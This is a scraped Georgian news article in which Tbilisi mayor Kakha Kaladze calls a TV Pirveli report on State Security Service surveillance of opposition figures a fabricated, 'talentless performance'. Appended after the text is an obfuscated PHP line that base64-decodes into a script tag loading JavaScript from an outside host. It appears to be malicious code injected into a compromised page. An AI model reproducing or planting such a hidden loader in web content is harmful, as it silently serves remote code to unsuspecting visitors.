celsiusi
ავერსი შნაიდერი
პარტია "ქართული ოცნების" გენერალური მდივნის, დედაქალაქის მერის კახა კალაძის განცხადებით, მედიაში 17 სექტემბერს გასული სიუჟეტი, რომელიც სუს-ის მხრიდან ოპოზიციის წარმომადგენლების უკანონო თვალთვალს ეხებოდა, "შეთითხნილია" და "უნიჭო სპექტაკლია".
 
"ეს არის ჩვეულებრივი, უნიჭო სპექტაკლი. მე ვნახე გუშინდელი სიუჟეტი, რომელიც იყო გაკეთებული, ძალიან უნიჭოდ დადგმული და შეთითხნილი იყო ეს ყველაფერი. საზოგადოება ძალან კარგად ხედავს ყველაფერს, ძალიან კარგად ხედავს არსებულ რეალობას, შესაბამისად, დეტალებში შესვლა და რაიმე სერიოზული კომენტარის გაკეთება ამ საკითხთან დაკავშირებით, არ მინდა",- განაცხადა კალაძემ მედიასთან საუბრისას.
 
მისივე თქმით, ნებისმიერ ადამიანს შეუძლია ანალოგიურის გაკეთება.
 
"მე დავჯდე ახლა და გავაკეთო ანალოგიურად ვიდეოები. ნებისმიერ ადამიანს შეუძლია ანალოგიურის გაკეთება",- აცხადებს კალაძე.
 
შეგახსენებთ, რომ 17 სექტემბერს „ტვ პირველის“ ეთერში გავიდა სიუჟეტი, პოლიტიკური ლიდერების უკანონო თვალთვალის თაობაზე. მოპოვებული მტკიცებულებებით დგინდება, რომ ოპოზიციურ სპექტრს ჩანერგილი აგენტების საშუალებითაც აკონტროლებენ.
477
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");